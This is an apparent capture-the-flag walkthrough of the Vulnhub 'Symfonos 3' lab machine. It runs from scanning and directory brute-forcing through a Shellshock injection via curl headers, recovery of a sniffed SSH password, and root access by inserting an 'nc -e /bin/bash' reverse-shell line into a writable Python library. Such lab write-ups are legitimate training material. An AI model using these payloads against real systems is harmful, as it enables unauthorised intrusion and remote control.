Vulnhub – Symfonos 3 Walkthrough

Scanning the target with nmap –A –T4 –p- 192.168.1.2 –vv

Now on port 80 we’re going to use dirsearch as dirsearch -u http://192.168.1.2/ -w /usr/share/dirb/wordlist/big.txt -e txt,php and we came to find several directories:

/gate

/cerberus/

tartarus/

/hermes

research

Inside /gate/Cerberus/tartarus using curl –v:

So maybe im in the wrong direction, so let’s try the cgi-bin and server-status directories but using gobuster:

gobuster dir -u http://192.168.1.2/cgi-bin -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

Now we found the underworld:

Ok the page is about uptime display:

Ok i searched google and it’s a shellshock code with bash CGI script we can use curl -v http://192.168.1.2/cgi-bin/underworld -H “custom:() { ignored; }; /usr/bin/id”

It worked, let’s tweak the code a bit curl -v http://192.168.1.2/cgi-bin/underworld -H “custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd “

So far its working we can now get a shell using CGI apache script using metasploit:

Using LinEnum.sh script i found a tcpdump file we can take advantage of using tcpdump –D

After sometime transfer the file output.pcap to your machine and read it as tcpdump -qns 0 -A -r output.pcap

We got user hades and password PTpZTfU4vxgzvRBE now we login using ssh service

Got nothing, well i used pspy32 tool to see what’s going on and i found this:

Viewing the file ftpclient.py

Ok the file ftplip is in the directory /usr/lib/python2.7 and the file is writable:

We can add our line to the file:

os.system(“nc -e /bin/bash 192.168.1.13 4444”)

And now we wait for a bit and we will get a shell back to our listening port nc –nlvp 4444